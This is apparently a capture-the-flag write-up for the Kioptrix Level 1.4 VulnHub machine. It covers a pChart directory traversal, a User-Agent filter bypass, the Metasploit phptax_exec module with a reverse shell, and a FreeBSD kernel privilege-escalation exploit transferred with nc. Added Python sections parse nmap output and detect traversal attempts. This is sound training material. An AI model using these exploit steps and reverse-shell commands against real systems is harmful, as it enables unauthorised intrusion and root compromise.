VulnHub Writeup : Kioptrix Level 1.4 (#5)

Box Stats:

Box Information    Details
Box Name           Kioptrix Level 1.4
Series             Kioptrix
Release Date       6 Apr 2014
Download Link      Link

Network Scan

The IP of the target VM is . Perform an nmap scan on the target:

$ nmap -sV --top-ports 1000 -oN nmap.txt

Starting Nmap 7.91 ( ) at 2021-10-26 16:38 EDT
Nmap scan report for
Host is up (0.00050s latency).
Not shown: 997 filtered ports
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 30.54 seconds

As we can see, ports 80 and 8080 are open. Checking the web server on port 80, it only shows the "It works!" message, but the page source contains a commented-out part that points to a pChart link.
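Before moving on, it helps to turn the scan above into something a defender can diff against a patch baseline. The parser below is an added example for this writeup (it is not part of the original post and not nmap code): it reads nmap's normal (-oN) output, keeps the port-table lines, and pulls the product/version tokens out of each banner. The embedded scan text is the writeup's own output with the target address still elided, which the parser does not need.

```python
"""Parse nmap "normal" (-oN) output like the scan above into structured records.

Added example for this writeup, not part of the original post or of nmap.
The scan text embedded below is the writeup's own output with the target
address still elided; the parser only needs the port table lines.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# One port-table line: "80/tcp   open   http    Apache httpd 2.2.21 (...)"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.+))?$"
)
# Software tokens nmap prints as name/version, e.g. "OpenSSL/0.9.8q", "PHP/5.3.8"
SLASH_VERSION = re.compile(r"(?P<name>[\w-]+)/(?P<ver>\d[\w.]*)")


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    version: str  # free-text version banner, empty when nmap printed none


def parse_nmap_normal(text: str) -> List[PortRecord]:
    """Return one record per port-table line; headers and summaries are skipped."""
    records = []
    for raw in text.splitlines():
        m = PORT_LINE.match(raw.strip())
        if m:
            records.append(PortRecord(int(m["port"]), m["proto"], m["state"],
                                      m["service"], (m["version"] or "").strip()))
    return records


def open_ports(records: List[PortRecord]) -> List[int]:
    """Port numbers nmap reported as open, in scan order."""
    return [r.port for r in records if r.state == "open"]


def software_versions(banner: str) -> Dict[str, str]:
    """Pull product/version pairs out of a banner so they can be compared
    against a patch baseline. "Apache httpd 2.2.21" is handled separately
    because nmap prints it with a space rather than a slash."""
    found: Dict[str, str] = {}
    m = re.search(r"Apache httpd (\S+)", banner)
    if m:
        found["Apache httpd"] = m.group(1)
    for t in SLASH_VERSION.finditer(banner):
        found[t["name"]] = t["ver"]
    return found


def version_inventory(text: str) -> Dict[int, Dict[str, str]]:
    """Map each open port to the software versions exposed on it."""
    return {r.port: software_versions(r.version)
            for r in parse_nmap_normal(text) if r.state == "open"}


# The writeup's own scan output (target address elided in the original).
SCAN_OUTPUT = """\
Starting Nmap 7.91 ( ) at 2021-10-26 16:38 EDT
Nmap scan report for
Host is up (0.00050s latency).
Not shown: 997 filtered ports
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 30.54 seconds
"""

if __name__ == "__main__":
    for port, versions in version_inventory(SCAN_OUTPUT).items():
        print(port, versions)
```

Running the script prints one line per open port with the Apache, mod_ssl, OpenSSL, DAV and PHP versions; the same inventory dictionary is what you would feed into a comparison against the versions your patch policy expects.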

Opening that link, there is a pChart application hosted on port 80.

A Google search shows that pChart 2.1.3 has XSS and directory traversal vulnerabilities; the directory traversal can be triggered by accessing the link below:

At this point we cannot do much with this vulnerability, so let's check port 8080.

It says access forbidden. But thanks to the directory traversal vulnerability we can read the Apache httpd.conf file. We also know that the OS is FreeBSD, so the httpd.conf file should be at /usr/local/etc/apache2x/httpd.conf; let's try to access it.
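The traversal used here exists because the script joins a user-supplied path to a directory without confining the result. The following is an added example (not code from the writeup or from pChart) showing the two things a defender wants for this class of bug: `resolve_within`, a containment check that percent-decodes, normalises and then verifies the requested file still lies under the intended base directory, and `traversal_attempts`, which scans Apache combined-format access log lines for `../` sequences, including percent-encoded and double-encoded forms. The base directory `/srv/www/app/examples`, the endpoint `/app/show.php?file=` and the log lines are constructed for illustration and are not the target's real paths.

```python
"""Mitigation and detection helpers for the directory traversal weakness above.

Added example, not code from the writeup or from pChart. The base directory,
the endpoint path and the access log lines are constructed for illustration.
"""
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote


def resolve_within(base_dir: str, requested: str) -> Optional[str]:
    """Return the absolute path if `requested` stays inside `base_dir`, else None.

    The value is percent-decoded once (as the web server does before handing it
    to the script), joined to the base and normalised with realpath, so any
    "../" sequences are collapsed *before* the containment check is made.
    """
    base = os.path.realpath(base_dir)
    relative = unquote(requested).lstrip("/\\")  # never accept an absolute path from the caller
    candidate = os.path.realpath(os.path.join(base, relative))
    # commonpath avoids the prefix bug where "/srv/app" would also accept "/srv/app2/..."
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def is_allowed(base_dir: str, requested: str) -> bool:
    """Convenience wrapper: True when the request resolves inside the base."""
    return resolve_within(base_dir, requested) is not None


# Apache combined log format: ip ident user [time] "method target proto" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
TRAVERSAL = re.compile(r"\.\.[\\/]")


def traversal_attempts(log_lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client ip, status, raw request target) for lines whose target
    contains "../" or "..\\" after decoding. Decoding twice catches
    double-encoded payloads such as %252e%252e%252f; the status code lets the
    analyst tell a 200 (file was served) from a 404 (nothing returned)."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not an access log entry, skip it
        decoded = unquote(unquote(m["target"]))
        if TRAVERSAL.search(decoded):
            hits.append((m["ip"], m["status"], m["target"]))
    return hits


# Constructed sample log lines (hypothetical endpoint and addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Oct/2021:16:40:01 -0400] "GET /app/show.php?file=..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fapache2x%2Fhttpd.conf HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '192.0.2.22 - - [26/Oct/2021:16:41:13 -0400] "GET /app/show.php?file=charts/pie.png HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [26/Oct/2021:16:42:40 -0400] "GET /app/show.php?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 231 "-" "curl/7.79"',
    "garbage line that is not an access log entry",
]

if __name__ == "__main__":
    base = "/srv/www/app/examples"
    for req in ("charts/pie.png", "../../../../usr/local/etc/apache2x/httpd.conf"):
        print(req, "->", resolve_within(base, req))
    for ip, status, target in traversal_attempts(SAMPLE_LOG):
        print("traversal attempt from", ip, "status", status, target)
```

The containment check deliberately normalises first and compares second; checking for the literal string `..` before decoding is what most broken filters do, and it is why encoded variants slip through. On the detection side, a hit with status 200 on a file-serving endpoint is the line that deserves an immediate look.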

The screenshot above shows the last lines of httpd.conf, which reveal that the web server checks the browser's User-Agent and only allows a User-Agent of Mozilla/4.0 to reach the application running on port 8080. Since the User-Agent header is chosen by the client, this is a filter rather than a real access control.

So we have to change the browser's user agent to Mozilla/4.0; for that we install the User Agent Switcher plugin in Firefox and then try to access the service running on port 8080.

Add Mozilla/4.0 (compatible; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8) as a User Agent Switcher entry (Kioptrix5).

Now enable the custom user agent, then access the service on port 8080:


The app hosted on port 8080 is phptax. A Google search shows that phptax has a remote code execution vulnerability and that a Metasploit module exists for it, so we are going to use Metasploit.

msf6 > use exploit/multi/http/phptax_exec
msf6 exploit(multi/http/phptax_exec) > set RHOSTS
msf6 exploit(multi/http/phptax_exec) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/phptax_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(multi/http/phptax_exec) > set lhost
lhost =>
msf6 exploit(multi/http/phptax_exec) > exploit

[*] Started reverse TCP double handler on
[*] - Sending request...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo y6th2VULrYqot44x;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Command: echo jVPGdJKnv4d3Y4jP;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "Connected: not found\r\nEscape: not found\r\njVPGdJKnv4d3Y4jP\r\n"
[*] Reading from socket B
[*] B: "y6th2VULrYqot44x\r\n"
[*] Matching...
[*] A is input...
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened ( -> at 2021-10-27 16:06:00 -0400

[*] Command shell session 2 opened ( -> at 2021-10-27 16:06:00 -0400
uid=80(www) gid=80(www) groups=80(www)
uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012  amd64

Now for privilege escalation: there is a kernel exploit for FreeBSD 9.0 on Exploit-DB. First download the exploit to the attacker machine, then transfer the exploit code to the target, compile it and run it there.

We are going to use nc to send the exploit to the target machine:

wget -O exploit.c
nc -lvvp 8888 < exploit.c

The nc listener is now waiting on port 8888. To download the file on the target machine, connect back to the attacker machine with:

nc 8888 > exploit.c

It may take a few seconds to download; then compile and run the exploit:

gcc exploit.c -o exploit
exploit.c:89:2: warning: no newline at end of file
uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)

And as we can see, we have root access to the machine.
